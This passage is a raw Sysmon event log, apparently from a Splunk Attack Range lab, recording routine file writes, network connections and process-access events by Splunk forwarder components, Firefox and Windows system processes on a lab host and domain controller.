23542300x8000000000000000152000Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:51.765{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C09FE560F60F4051046A21DFF02A35A,SHA256=EED4CB9DD6555D304A671B8C92D6B685EB51785DA69FA46074D17B753D86A671,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151999Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:49.870{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58426-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151998Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:51.281{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E144E2B67D0B7FDC40ACC98C188922B7,SHA256=CA78C063C234416EFE53B6C5FE8702C780852BB25E945D951C42ED595DFE680A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151997Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:51.281{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A4DAB544404A957AD2321C16E76663DD,SHA256=C60BE766E01AB5204FA057D72952DC768D25FB22802C9DFBD07565AB59CC93C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105207Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:52.741{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63105EAE49FF9FF6559DE221C57CEFC8,SHA256=D35F69EE232D0A10E7E9BCE18151FDE192E6F4253AE3E2E4AF374B34FBAD3CDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152001Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:52.796{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A528019A993276ACC3774C7776C252F,SHA256=15F4EEFB046D226A70C17F46D6111B610011FC210A4889AA5516C7E158B086DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152002Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:53.814{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3950831BF2ADE91FE8E1D26FE241AE76,SHA256=B685D6A7376A6BB79F56D179CABD89DFAE5D825A9870936F37477F51A1E2ED0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105209Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:54.106{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF1D7A28192EAABC5D283939CD181EA1,SHA256=3DA79A59D9643DA685403C9F8D305C6AA7A59E1799FBEC20FEBDA117B36011BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105208Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:51.798{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55445-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000152003Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:54.832{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F45ADBC276D7F6ACFC701BA415E152AA,SHA256=B63272EACDABE38C5863B4DBDA957ACF3D120699FC403D6157300AEE083C87A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105210Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:55.469{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=399F5B6FA698691105810E0A26649FEF,SHA256=3C33E8BB678AABC63B4205D141771E8BE0A8293540A739D45A02D460CE1B1BCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152010Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:55.883{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=6DCCFD08555616B19D24C9728D62C49C,SHA256=2AA8AB5B7ECC7195E8BADFF051B82148182AE431BCBF9A1CE7A522E9AC776E55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152009Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:55.883{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=67CB9610C2B420215F7AB312A73C0859,SHA256=A0F11A8A709FC681BA78A0DF29DC38C331CF68CFEB48225ED54CEF5EC4DB0601,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152008Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:55.883{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=CD6AB584094761007A669D8F30428750,SHA256=71ED28FE713088088E116C1D92D7D70CF20DA41D6C39923D50590A5C26A75EA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152007Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:55.883{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=5126F0973C8EDBE81540A1E861159BDA,SHA256=154E9E6FCB388DBFE03A1E00B144FE98BC38F4B152B38069C7A6A30A80026550,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152006Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:55.883{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=35D16559FE1A43D2AD015CE5B04D736B,SHA256=F2CD0E3B01CB4A1B152A9E5AB418582CB8E7DC91EAF8B08D800C5BE44F6E46D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152005Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:55.883{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=EC14DF1D27BB03A50CA3A2B8BBB16237,SHA256=B6D4E2859F0E6BFDBF51092C2F92352E2DB1DE1AE9E7A0CA76E3CEF85D4CD31E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152004Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:55.836{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22A292E23F8C69585672CC7E4F52C5E1,SHA256=189D94A7BA2517A75A0EDB9F1F6082B396CC367C2A158DF12A3FA5A175D8D7C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105211Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:56.839{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16D0610B0E95EE9B7C4748F993FD2F8F,SHA256=42358CF084126A1F6C27C2716E6BE30452BC138350A936595592683DF8C05143,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152012Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:56.846{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=838D4C73B8D250E8EFA22974D018BC8B,SHA256=DD5E211BF5FD91B6885CA73A8ECFC68E4B53D49EBBC63E940315CAD71DA8A6D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152011Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:56.162{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E144E2B67D0B7FDC40ACC98C188922B7,SHA256=CA78C063C234416EFE53B6C5FE8702C780852BB25E945D951C42ED595DFE680A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152014Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:57.862{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC1E0DDEEB8D9438D18946586A6F085D,SHA256=E7BE89DDBC4F403EC90176430D93DBE15E1DCB935A65E86533DF7CDB504F3298,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000152013Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:54.966{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58427-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000105213Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:58.887{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03AEEA4A85833CF7EC33E78463DF4247,SHA256=A24C5AC8BC995CAF4E670ADE964FCC42173F2BC5E5113F84AAF317B93A6F6B17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105212Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:58.204{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE7C881482467A78F41A04EE8DCD45B7,SHA256=1A8F8974CBD8341CF3BB4243655BBD5A7230F4D62FFF67201040F386A09B1EF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152015Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:58.892{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3157FC70E3947BF1A119DDE74C96B35A,SHA256=5AD8C54726FF8FAB503E5DF0E8587565A546F2316540193B50118EE86C351168,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105222Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:59.573{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-718F-60CA-3713-00000000CF01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105221Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:59.570{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105220Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:59.570{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105219Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:59.570{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105218Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:59.570{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105217Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:59.570{54715871-FD16-60C9-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{54715871-718F-60CA-3713-00000000CF01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105216Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:59.570{54715871-FD28-60C9-3000-00000000CF01}24483280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{54715871-718F-60CA-3713-00000000CF01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105215Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:59.569{54715871-718F-60CA-3713-00000000CF01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{54715871-FD16-60C9-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{54715871-FD28-60C9-3000-00000000CF01}2448C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000105214Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:59.567{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31423CF05CABE278F5DDD52BB9325328,SHA256=800100D00D77BB776BC1B4832148BB32ECD93E04DA259D798B00266E3107B8F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000152016Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:59.912{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DEC33844F2AC916571AAC8EFCC8FB46,SHA256=0EBBB600B6CFBA6EC67065CCE17179EBE6AA95B3B15CCFCDB9BDD20D91B1FBEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105241Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:00.935{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF35790EB070EB90090975EF321FC4C3,SHA256=415FD1FB3D9270C09C34965CC0E9508958BE0A270909B3F18DEE30A0CF75EEEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105240Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:00.934{54715871-FD29-60C9-3700-00000000CF01}33683396C:\Windows\system32\conhost.exe{54715871-7190-60CA-3913-00000000CF01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105239Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:00.929{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105238Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:00.929{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD28-60C9-2B00-00000000CF01}3040C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105237Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:48:00.929{54715871-FD16-60C9-0500-00000000CF01}408368C:\Windows\system32\csrss.exe{54715871-7190-60CA-3913-00000000CF01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105236Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 